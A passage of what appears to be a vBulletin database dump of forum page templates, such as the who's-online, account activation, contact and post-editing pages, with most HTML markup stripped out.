    \r\n\r\n\".(($show[\'ajax_resolve\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n
    \r\n\r\n \".(($GLOBALS[\'vbulletin\']->options[\'WOLguests\']) ? (\"\r\n $vbphrase[display]:\r\n \r\n    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'ip\']) ? (\"\r\n $vbphrase[user_agent]:\r\n \r\n    \r\n \") : (\"\")).\"\r\n\r\n $vbphrase[per_page]:\r\n \r\n    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'hidden\']) ? (\"\r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'badlocation\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    +  $vbphrase[user_is_on_your_contact_list]
    *  $vbphrase[user_is_invisible_to_others]
    \\\"$vbphrase[viewing_forum_closed]\\\"  $vbphrase[viewing_forum_closed]
    \\\"$vbphrase[viewing_no_permission_message]\\\"  $vbphrase[viewing_no_permission_message]
    \\\"$vbphrase[viewing_error_message]\\\"  $vbphrase[viewing_error_message]
    \r\n
    \r\n $forumjump\r\n
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$vboptions[bbtitle] - $vbphrase[whos_online]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$onlinebits\r\n
    \r\n \r\n $vbphrase[reload_this_page]\r\n \r\n $vbphrase[x_members_and_y_guests]
    $vbphrase[most_users_ever_online_was_x_y_at_z]\r\n
    \r\n \r\n &order=desc&sort=time&pp=$perpage&page=$pagenumber\">$vbphrase[last_activity] $sortarrow[time]\r\n \r\n &order=asc&sort=username&pp=$perpage&page=$pagenumber\">$vbphrase[username] $sortarrow[username]\r\n &order=asc&sort=location&pp=$perpage&page=$pagenumber\">$vbphrase[location_temp] $sortarrow[location]$vbphrase[ip_address]$vbphrase[instant_messaging]
    \r\n\r\n\r\n \r\n \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n \r\n $vbphrase[display]:\r\n \r\n    \r\n \r\n\r\n \r\n $vbphrase[user_agent]:\r\n \r\n    \r\n \r\n\r\n $vbphrase[per_page]:\r\n \r\n    \r\n\r\n\r\n\r\n \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    +  $vbphrase[user_is_on_your_contact_list]
    *  $vbphrase[user_is_invisible_to_others]
    \"$vbphrase[viewing_forum_closed]\"  $vbphrase[viewing_forum_closed]
    \"$vbphrase[viewing_no_permission_message]\"  $vbphrase[viewing_no_permission_message]
    \"$vbphrase[viewing_error_message]\"  $vbphrase[viewing_error_message]
    \r\n
    \r\n $forumjump\r\n
    \r\n\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212144655, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1706, -1, 'whosonlinebit', '\r\n\r\n \r\n $userinfo[time]\r\n \".(($show[\'loggedinuser\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[musername]$userinfo[hidden]\".(($show[\'buddy\']) ? (\"+\") : (\"\")).\"\r\n \") : (\"\r\n \".(($show[\'spider\']) ? (\"$spidertype\") : (\"$userinfo[musername]\")).\"\r\n \")).\"\r\n \r\n\r\n \r\n
    \r\n \r\n \".(($show[\'lockedout\']) ? (\"\\\"$vbphrase[viewing_forum_closed]\\\"\") : (\"\")).\"\r\n \".(($show[\'nopermission\']) ? (\"\\\"$vbphrase[viewing_no_permission_message]\\\"\") : (\"\")).\"\r\n \".(($show[\'errormessage\']) ? (\"\\\"$vbphrase[viewing_error_message]\\\"\") : (\"\")).\"\r\n \".(($show[\'reallocation\']) ? (\"\\\"$userinfo[location]\\\"\") : (\"\")).\"\r\n \r\n $userinfo[action]\r\n
    \r\n \".(($show[\'where\']) ? (\"\r\n
    \r\n \".(($show[\'subscribed\']) ? (\"\\\"$vbphrase[you_are_subscribed_to_this_thread]\\\"\") : (\"\")).\"\r\n $userinfo[where]\r\n
    \r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($show[\'ip\']) ? (\"\r\n
    \r\n \".(($show[\'ajax_resolve\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=resolveip&ipaddress=$userinfo[host_encoded]\\\" id=\\\"resolveip_$count\\\" title=\\\"$vbphrase[resolve_ip_address]\\\">$userinfo[host]\r\n \") : (\"\r\n $userinfo[host]\r\n \")).\"\r\n \".(($show[\'useragent\']) ? (\"
    $userinfo[useragent]\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($GLOBALS[\'vbulletin\']->options[\'showimicons\']) ? (\"\r\n \r\n $userinfo[aimicon]\r\n $userinfo[icqicon]\r\n $userinfo[msnicon]\r\n $userinfo[yahooicon]\r\n $userinfo[skypeicon]\r\n \r\n \") : (\"\")).\"\r\n\r\n', '\r\n\r\n \r\n $userinfo[time]\r\n \r\n $userinfo[musername]$userinfo[hidden]+\r\n \r\n $spidertype$userinfo[musername]\r\n \r\n \r\n\r\n \r\n
    \r\n \r\n \"$vbphrase[viewing_forum_closed]\"\r\n \"$vbphrase[viewing_no_permission_message]\"\r\n \"$vbphrase[viewing_error_message]\"\r\n \"$userinfo[location]\"\r\n \r\n $userinfo[action]\r\n
    \r\n \r\n
    \r\n \"$vbphrase[you_are_subscribed_to_this_thread]\"\r\n $userinfo[where]\r\n
    \r\n
    \r\n \r\n\r\n \r\n
    \r\n \r\n $userinfo[host]\r\n \r\n $userinfo[host]\r\n \r\n
    $userinfo[useragent]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n $userinfo[aimicon]\r\n $userinfo[icqicon]\r\n $userinfo[msnicon]\r\n $userinfo[yahooicon]\r\n $userinfo[skypeicon]\r\n \r\n \r\n\r\n', 'template', 1144776885, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1707, -1, 'whosonline_resolveip', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$metarefresh\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[whos_online]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[resolve_ip_address]
    $vbphrase[ip_address]$ipaddress
    $vbphrase[resolved_host_name]\".(($resolved_host) ? (\"$resolved_host\") : (\"$vbphrase[unable_resolve_ip]\")).\"
    \r\n\r\n$forumjump\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$metarefresh\r\n$vboptions[bbtitle] - $vbphrase[whos_online]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n
    $vbphrase[resolve_ip_address]
    $vbphrase[ip_address]$ipaddress
    $vbphrase[resolved_host_name]$resolved_host$vbphrase[unable_resolve_ip]
    \r\n\r\n$forumjump\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729845, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1708, -1, 'activateform', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[activate_your_account]\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\"

    \")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[activate_your_account]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[activate_your_account]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[username]:
    \r\n userinfo[\'username\'] . \"\\\" />\r\n
    \r\n $vbphrase[activation_code]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n \" . construct_phrase(\"$vbphrase[you_lost_activation_code_or_username]\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=requestemail\") . \"\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[activate_your_account]\r\n\r\n\r\n$header\r\n$navbar

    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[activate_your_account]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[activate_your_account]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[username]:
    \r\n \r\n
    \r\n $vbphrase[activation_code]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[you_lost_activation_code_or_username]\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875352, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1709, -1, 'activate_requestemail', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[email_activation_codes]\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\"

    \")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[email_activation_codes]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_activation_codes]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[request_activation_code_sent_email]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[email_activation_codes]\r\n\r\n\r\n$header\r\n$navbar

    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[email_activation_codes]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[email_activation_codes]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[request_activation_code_sent_email]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875371, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1710, -1, 'attachmentbit', '\r\n \r\n \\\"\" session->vars[\'sessionurl\'] . \"attachmentid=$attachment[attachmentid]&d=$attachment[dateline]\\\" target=\\\"_blank\\\">$attachment[filename]\r\n \r\n \r\n $attachment[filesize]\r\n \r\n \r\n $attachment[counter]\r\n \r\n', '\r\n \r\n \"<phrase$vbphrase[file_type_x]\" width=\"16\" height=\"16\" border=\"0\" style=\"vertical-align:middle\" /> $attachment[filename]\r\n \r\n \r\n $attachment[filesize]\r\n \r\n \r\n $attachment[counter]\r\n \r\n', 'template', 1138633087, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'), (1711, -1, 'ATTACHMENTS', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[attachments] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$attachments\r\n\r\n \r\n\r\n
    \r\n $vbphrase[attachments]\r\n
    $vbphrase[attachment]$vbphrase[size]$vbphrase[views]
    \r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vbphrase[attachments] - $vboptions[bbtitle]\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n$attachments\r\n\r\n \r\n\r\n
    \r\n $vbphrase[attachments]\r\n
    $vbphrase[attachment]$vbphrase[size]$vbphrase[views]
    \r\n\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1712, -1, 'board_inactive_warning', '
    $vbphrase[alert_board_off]
    \r\n', '
    $vbphrase[alert_board_off]
    \r\n', 'template', 1070144171, 'vBulletin Solutions', '', 'vbulletin'), (1713, -1, 'contactus', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[contact_us]\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\"

    \")).\"\r\n\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]:
    \r\n
      $errormessages
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_email_to_forum_administrator]\r\n $vbphrase[contact_us]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_details]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_name] :
    \r\n \r\n
    \r\n $vbphrase[email_address] :
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[subject]\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->options[\'contactusoptions\']) ? (\"\r\n $contactusoptions\r\n \".(($GLOBALS[\'vbulletin\']->options[\'contactusother\']) ? (\"\r\n
    \r\n \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \") : (\"\r\n $vbphrase[subject] :
    \r\n \r\n \")).\"\r\n
    \r\n
    \r\n\r\n $human_verify\r\n\r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[contact_us]\r\n\r\n\r\n$header\r\n$navbar

    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[errors_occured_when_submitted]:
    \r\n
      $errormessages
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_email_to_forum_administrator]\r\n $vbphrase[contact_us]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[your_details]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[your_name] :
    \r\n \r\n
    \r\n $vbphrase[email_address] :
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[subject]\r\n
    \r\n \r\n $contactusoptions\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n \r\n $vbphrase[subject] :
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $human_verify\r\n\r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1265204281, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1714, -1, 'contactus_option', '
    \r\n', '
    \r\n', 'template', 1068724587, 'vBulletin Solutions', '', 'vbulletin'), (1715, -1, 'converse', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n
    \r\n \r\n $html\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n \r\n $pagetitle\r\n
    \r\n $html\r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1204913623, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'), (1716, -1, 'editpoll', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_poll]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\r\n $vbphrase[edit_poll]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n
    \r\n
    :
    \r\n options[\'titlemaxchars\'] . \"\\\" />\r\n
    \r\n\r\n
    \r\n $vbphrase[poll_options]\r\n \r\n $pollbits\r\n\r\n \".(($show[\'additional_option1\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'additional_option2\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n
    $vbphrase[keep_poll_options_short]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_timeout]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[automatically_close_poll_enter_days]
    \r\n
    \r\n\r\n \".(($show[\'makeprivate\']) ? (\"\r\n
    \r\n $vbphrase[poll_options]\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[close_poll]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[closing_poll_impossible_to_vote]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[edit_poll]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n $vbphrase[edit_poll]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n
    \r\n
    :
    \r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_options]\r\n \r\n $pollbits\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[keep_poll_options_short]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[poll_timeout]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[automatically_close_poll_enter_days]
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[poll_options]\r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[close_poll]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[closing_poll_impossible_to_vote]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875524, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1717, -1, 'editpost', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[edit_post]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'deletepostoption\']) ? (\"\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[delete_this_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n \".(($show[\'physicaldeleteoption\'] AND $show[\'keepattachmentsoption\']) ? (\"()\") : (\"\")).\"\r\n
    \r\n \".(($show[\'physicaldeleteoption\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title]\r\n $vbphrase[edit_post]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
    \r\n \".(($prefix_options) ? (\"\r\n \r\n \") : (\"\")).\"\r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" title=\\\"$vbphrase[optional]\\\" />\r\n   \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    \" . construct_phrase(\"$vbphrase[message_by_x_on_y_at_z]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$postinfo[userid]\", \"$postinfo[username]\", \"$postinfo[postdate]\", \"$postinfo[posttime]\") . \":
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'podcasturl\']) ? (\"\r\n \r\n
    \r\n $vbphrase[podcast_options]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[podcast_url]: $vbphrase[filesize_bytes]:
     
    $vbphrase[subtitle]: $vbphrase[explicit]:
    $vbphrase[keywords]:$vbphrase[author]:
    \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\'] != \'\') ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \".(($show[\'subscriptionfolders\']) ? (\"\") : (\"\")).\"\r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[edit_post]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[delete_this_message]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[delete_message_check_appropriate_option]
    \r\n \r\n
    $vbphrase[deleting_message_deletion_of_thread]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[deletion_options]\r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n \r\n ()\r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n$postpreview\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n $vbphrase[edit_post]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n
    $vbphrase[reason_for_editing]:
    \r\n
    \r\n
    \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
    \r\n \r\n \r\n \r\n \r\n   \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message_by_x_on_y_at_z]:
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n $vbphrase[podcast_options]\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[podcast_url]: $vbphrase[filesize_bytes]:
     
    $vbphrase[subtitle]: $vbphrase[explicit]:
    $vbphrase[keywords]:$vbphrase[author]:
    \r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n $attachmentoption\r\n\r\n \r\n
    \r\n $vbphrase[thread_subscription]\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[notification_type]:
    $vbphrase[folder]:
    \r\n
    \r\n
    \r\n\r\n $threadmanagement\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
